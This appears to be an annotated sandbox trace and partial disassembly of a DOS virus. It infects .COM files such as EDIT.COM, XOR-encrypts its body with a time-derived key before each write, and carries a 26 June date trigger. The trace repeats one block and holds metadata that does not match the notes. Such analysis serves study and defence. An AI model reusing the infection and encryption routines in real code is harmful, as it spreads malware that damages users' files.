; NOTE(review): assumes DH = month and DL = day as returned by DOS Get date, which makes
; the constants 6 and 0x1a mean 26 June -- confirm against the DOS call reference.
2018-12-25T12:42:40.291894529Z 42 PC: 15671 | Get date 0x15671: cmp dh, 6  ; DH == 6 ?
0x15674: jne 0x15682  ; no: take the normal exit path
0x15676: cmp dl, 0x1a  ; DL == 0x1a (26) ?
0x15679: jne 0x15682  ; no: take the normal exit path
0x1567b: call 0x15754  ; both matched: routine at 0x15754 is not shown on this page
0x1567e: mov ah, 0x4c  ; DOS function 4Ch = op 76 in the trace ('Terminate with return code')
0x15680: int 0x21  ; AL (the return code) is not set inside this snippet
0x15682: mov ax, 0x100  ; normal path: 0x100 is the offset a .COM image starts at
0x15685: push ax  ; push it so the near ret below transfers there
0x15686: xor ax, ax  ; clear the general registers before leaving
0x15688: xor bx, bx
0x1568a: xor cx, cx
0x1568c: xor dx, dx
0x1568e: xor di, di
0x15690: xor si, si
0x15692: xor bp, bp
0x15694: ret  ; pops 0x100 into IP; presumably hands control to the host program
; NOTE(review): the three lines below follow an unconditional ret and are probably data
; decoded as code; with the usual near/short encodings their operand bytes would be
; 56 69 / 75 / 20 after opcodes E9, 72, 73, i.e. the ASCII text "Virus " -- verify on the raw bytes.
0x15695: jmp 0x1bfee
0x15698: jb 0x1570f
0x1569a: jae 0x156bc
2018-12-25T12:42:40.295032554Z 99 PC: 143ba | Get DBCS lead byte table pointer
2018-12-25T12:42:40.296980815Z 68 PC: 143d4 | I/O control for devices (Set for = '')
2018-12-25T12:42:40.309750418Z 68 PC: 143df | I/O control for devices (Set for = '')
2018-12-25T12:42:40.312093683Z 68 PC: 143ea | I/O control for devices (Set for = '')
2018-12-25T12:42:40.31421075Z 68 PC: 143f2 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-25T12:42:40.31767476Z 48 PC: 143f7 | Get DOS version
2018-12-25T12:42:40.320045953Z 64 PC: 14535 | Write file or device (Write 27 bytes on handle 2)
2018-12-25T12:42:40.32587106Z 76 PC: 131dd | Terminate with return code (Return code = '4')

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15109,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
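2018-12-25T12:42:39.568485771Z 37 PC: 15538 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: 'Auxiliary input' is the name of DOS function 03h, not of this vector; interrupt 3 is the CPU breakpoint vector, which debuggers rely on]
2018-12-25T12:42:39.571241774Z 37 PC: 1555e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [note: 'Set random record number' is the name of DOS function 24h, not of this vector; interrupt 36 (24h) is the DOS critical-error handler, so replacing it can suppress the error prompt when a write fails]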
2018-12-25T12:42:39.574484122Z 78 PC: 15592 | Find first file
2018-12-25T12:42:39.585296598Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.59368462Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:39.599972207Z 66 PC: 155c3 | Move file pointer
2018-12-25T12:42:39.601354682Z 62 PC: 155d8 | Close file
2018-12-25T12:42:39.603082464Z 67 PC: 156d7 | Get or set file attributes
2018-12-25T12:42:40.424856729Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:40.431830422Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:40.434150262Z 66 PC: 15707 | Move file pointer
; Captured after the 'Get time' call (op 44): XOR a 0x13c-word region with a 16-bit key,
; write 0x2a0 (672) bytes through INT 21h, then XOR the same region again.
; Written range is [bp + 0x108, bp + 0x3a8); XORed range is [bp + 0x118, bp + 0x390).
; The key word at [bp + 0x394] is inside the written range but outside the XORed one, so
; each written copy carries its key unmodified at offset 0x28c of the 672 bytes; the first
; 0x10 bytes are written without the XOR pass as well.
; NOTE(review): DX presumably still holds the seconds/hundredths returned by Get time -- confirm.
2018-12-25T12:42:40.435575876Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx  ; save DX as the XOR key
0x157d4: lea si, word ptr [bp + 0x118]  ; SI = start of the region to XOR
0x157d8: mov ax, word ptr [bp + 0x394]  ; AX = key
0x157dc: mov cx, 0x13c  ; loop count: 0x13c words = 0x278 bytes
0x157df: xor word ptr [si], ax  ; XOR one word with the key
0x157e1: inc si  ; advance SI by two bytes,
0x157e2: inc si  ; i.e. to the next word
0x157e3: loop 0x157df  ; decrement CX, repeat until it reaches 0
0x157e5: mov ah, 0x40  ; DOS function 40h = op 64 in the trace ('Write file or device')
0x157e7: mov cx, 0x2a0  ; byte count: 0x2a0 = 672
0x157ea: lea dx, word ptr [bp + 0x108]  ; buffer start, 0x10 bytes before the XORed region
0x157ee: int 0x21  ; issue the write; the handle register is not set inside this snippet
0x157f0: lea si, word ptr [bp + 0x118]  ; second pass over the same region
0x157f4: mov ax, word ptr [bp + 0x394]  ; reload the same key
0x157f8: mov cx, 0x13c  ; same word count as the first pass
0x157fb: xor word ptr [si], ax  ; XOR with the same key undoes the first pass
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret  ; the in-memory region is back to its pre-write contents
2018-12-25T12:42:40.438076575Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-25T12:42:40.443123461Z 87 PC: 15718 | Get or set file date and time
2018-12-25T12:42:40.458515104Z 62 PC: 1571c | Close file
2018-12-25T12:42:40.462866677Z 67 PC: 1572a | Get or set file attributes
2018-12-25T12:42:40.468996391Z 79 PC: 155ec | Find next file
2018-12-25T12:42:40.471547919Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.476182997Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.480924449Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.483312736Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.485201536Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.494798416Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.502409285Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.506054239Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.507319995Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.509993576Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.517741868Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.519177604Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.527568463Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.537614055Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.540879015Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.549105958Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.555402065Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.556649947Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.558188708Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.566577618Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.570591446Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.572298261Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.574103353Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.576084659Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.585536682Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.587858902Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.594772273Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.60425052Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.611351347Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.618026377Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.623199264Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.624885741Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.626480245Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.635767891Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.6428888Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.645516655Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.646626331Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.649103715Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.656190895Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.657370374Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.664355671Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.674479789Z 79 PC: 155ec | Find next file (See above)
; Captured after the 'Get date' call (op 42): compare the date against fixed constants and
; either call 0x15754 and terminate, or clear the registers and return to offset 0x100.
; NOTE(review): assumes DH = month and DL = day as returned by DOS Get date, which makes
; the constants 6 and 0x1a mean 26 June -- confirm against the DOS call reference.
2018-12-25T12:42:40.67919717Z 42 PC: 15671 | Get date 0x15671: cmp dh, 6  ; DH == 6 ?
0x15674: jne 0x15682  ; no: take the normal exit path
0x15676: cmp dl, 0x1a  ; DL == 0x1a (26) ?
0x15679: jne 0x15682  ; no: take the normal exit path
0x1567b: call 0x15754  ; both matched: routine at 0x15754 is not shown on this page
0x1567e: mov ah, 0x4c  ; DOS function 4Ch = op 76 in the trace ('Terminate with return code')
0x15680: int 0x21  ; AL (the return code) is not set inside this snippet
0x15682: mov ax, 0x100  ; normal path: 0x100 is the offset a .COM image starts at
0x15685: push ax  ; push it so the near ret below transfers there
0x15686: xor ax, ax  ; clear the general registers before leaving
0x15688: xor bx, bx
0x1568a: xor cx, cx
0x1568c: xor dx, dx
0x1568e: xor di, di
0x15690: xor si, si
0x15692: xor bp, bp
0x15694: ret  ; pops 0x100 into IP; presumably hands control to the host program
; NOTE(review): the three lines below follow an unconditional ret and are probably data
; decoded as code; with the usual near/short encodings their operand bytes would be
; 56 69 / 75 / 20 after opcodes E9, 72, 73, i.e. the ASCII text "Virus " -- verify on the raw bytes.
0x15695: jmp 0x1bfee
0x15698: jb 0x1570f
0x1569a: jae 0x156bc
2018-12-25T12:42:40.681649931Z 99 PC: 143ba | Get DBCS lead byte table pointer
2018-12-25T12:42:40.682561448Z 68 PC: 143d4 | I/O control for devices (Set for = '')
2018-12-25T12:42:40.683473423Z 68 PC: 143df | I/O control for devices (Set for = '')
2018-12-25T12:42:40.685185411Z 68 PC: 143ea | I/O control for devices (Set for = '')
2018-12-25T12:42:40.686107299Z 68 PC: 143f2 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-25T12:42:40.687140466Z 48 PC: 143f7 | Get DOS version
2018-12-25T12:42:40.688790065Z 64 PC: 14535 | Write file or device (Write 27 bytes on handle 2)
2018-12-25T12:42:40.691529791Z 76 PC: 131dd | Terminate with return code (Return code = '4')